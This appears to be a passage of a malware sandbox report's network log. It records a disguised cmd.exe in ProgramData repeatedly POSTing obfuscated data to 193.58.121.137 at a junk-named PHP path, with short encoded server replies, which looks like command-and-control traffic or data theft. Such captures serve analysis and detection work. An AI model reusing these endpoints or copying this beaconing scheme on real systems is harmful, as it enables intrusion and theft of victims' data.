                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:32 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  59192.168.2.449998193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:32.501857996 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:32.857111931 CET2560OUTData Raw: 5f 57 5c 52 5c 44 5f 56 5a 5c 55 51 59 5a 54 56 56 5b 5d 41 50 5c 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _W\R\D_VZ\UQYZTVV[]AP\ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0 3>Y'7"%,3+>8<4>$>5R)0<,5%Y 'S<='_!%Y)7
                                                                                                                                  Jan 3, 2025 20:48:33.167386055 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:33.300152063 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:33 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  60192.168.2.450008193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:34.132802963 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:34.486675024 CET2552OUTData Raw: 5f 52 5c 59 59 4a 5a 50 5a 5c 55 51 59 5e 54 5b 56 50 5d 45 50 50 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _R\YYJZPZ\UQY^T[VP]EPPZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+X0>=]1',$\>=<&P%X**0/Z:1\7$/T('_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:34.811043978 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:34.942147017 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:34 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  61192.168.2.450014193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:35.067047119 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:35.419471025 CET2560OUTData Raw: 5a 51 59 59 59 41 5f 52 5a 5c 55 51 59 5f 54 5b 56 59 5d 41 50 57 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZQYYYA_RZ\UQY_T[VY]APWZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?0;X&.*&%&<3(7?:V%9S)U0:5 R(-'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:35.739481926 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:35.870773077 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:35 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  62192.168.2.450024193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:36.400163889 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:36.747652054 CET2560OUTData Raw: 5f 5e 59 58 59 4a 5a 51 5a 5c 55 51 59 5c 54 54 56 51 5d 46 50 5c 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^YXYJZQZ\UQY\TTVQ]FP\ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&('0[2'%Z1+?[?<4*V1V)#^-9_7'?'_!%Y)/
                                                                                                                                  Jan 3, 2025 20:48:37.102171898 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:37.232892990 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:37 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  63192.168.2.450031193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:37.358730078 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:37.716480017 CET2560OUTData Raw: 5a 54 59 5d 5c 40 5a 51 5a 5c 55 51 59 57 54 57 56 5f 5d 46 50 57 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZTY]\@ZQZ\UQYWTWV_]FPWZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F('$X)X%%X1Z<$<7>W&>*9%24W+'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:38.058448076 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:38.190577984 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:37 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  64192.168.2.450037193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:38.314965963 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:38.695087910 CET2560OUTData Raw: 5f 54 5c 52 59 4b 5a 56 5a 5c 55 51 59 5d 54 57 56 5e 5d 45 50 5c 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _T\RYKZVZ\UQY]TWV^]EP\ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(383>!Y1&'/0Y<=,+B5&=39!X4+?='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:38.959419966 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:39.088438034 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:38 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  65192.168.2.450043193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:39.174160004 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:39.541240931 CET1884OUTData Raw: 5f 57 5c 5b 59 43 5a 50 5a 5c 55 51 59 5b 54 52 56 51 5d 44 50 53 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _W\[YCZPZ\UQY[TRVQ]DPSZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F)0<3.Y%&3?=+<:P&9>U3Y9%7'8+'_!%Y)3
                                                                                                                                  Jan 3, 2025 20:48:39.854091883 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:40.001188993 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:39 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 07 27 18 3c 57 33 38 3c 0a 27 14 36 1b 2a 3f 3f 0b 39 32 2c 5e 36 03 27 54 2a 33 02 10 3d 3f 2c 5a 21 11 3d 08 21 11 0f 58 3f 00 23 5b 03 1d 21 01 35 0c 2e 1d 25 17 29 13 2f 30 3f 1c 26 04 39 12 28 58 35 15 23 3e 2a 54 36 3e 34 56 2d 33 3e 03 26 2c 2c 06 3c 03 26 1e 26 2f 21 51 00 10 39 57 27 33 26 01 24 05 26 12 26 03 3d 5b 33 1b 3f 59 36 2f 3d 08 31 3b 21 10 2f 21 27 0f 25 32 0e 56 21 0d 3f 07 3e 3a 35 51 32 3b 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: %'<W38<'6*??92,^6'T*3=?,Z!=!X?#[!5.%)/0?&9(X5#>*T6>4V-3>&,,<&&/!Q9W'3&$&&=[3?Y6/=1;!/!'%2V!?>:5Q2;"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  66192.168.2.450045193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:39.263926029 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:39.608553886 CET2560OUTData Raw: 5f 54 59 59 5c 40 5f 55 5a 5c 55 51 59 59 54 56 56 5e 5d 47 50 52 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _TYY\@_UZ\UQYYTVV^]GPRZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B?0X0>2')['<+=/<"1=V= 3Z.& 7R?'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:39.911752939 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:40.045159101 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:39 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  67192.168.2.450052193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:40.173005104 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:40.529149055 CET2560OUTData Raw: 5f 56 5c 59 59 42 5f 52 5a 5c 55 51 59 57 54 50 56 50 5d 45 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\YYB_RZ\UQYWTPVP]EPUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A(''X:2'2,,[>.$<$:T&-&*3'[.6%^4W)-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:40.855581045 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:40.986073017 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:40 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  68192.168.2.450058193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:41.112837076 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:41.466485977 CET2560OUTData Raw: 5f 5f 5c 5c 59 41 5a 5b 5a 5c 55 51 59 5a 54 5a 56 51 5d 40 50 5c 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __\\YAZ[Z\UQYZTZVQ]@P\Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A<<$!Y%6&?U<4*Q&* 3^-> 70('_!%Y)7
                                                                                                                                  Jan 3, 2025 20:48:41.760885000 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:41.892513037 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:41 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  69192.168.2.450071193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:43.154392958 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:43.514444113 CET2552OUTData Raw: 5a 54 5c 5b 59 41 5a 57 5a 5c 55 51 59 5e 54 57 56 5e 5d 46 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZT\[YAZWZ\UQY^TWV^]FP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(#,'*14!]1++-<?'*V%*>3-%"740)='_!%Y)7
                                                                                                                                  Jan 3, 2025 20:48:43.812465906 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:43.953830957 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:43 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  70192.168.2.450077193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:44.084906101 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:44.437975883 CET2560OUTData Raw: 5a 54 59 5d 5c 43 5a 55 5a 5c 55 51 59 5f 54 56 56 51 5d 44 50 50 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZTY]\CZUZ\UQY_TVVQ]DPPZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(8$="12/<>+P($Q$..*U?9*#/<-'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:44.768383980 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:44.900430918 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:44 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  71192.168.2.450080193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
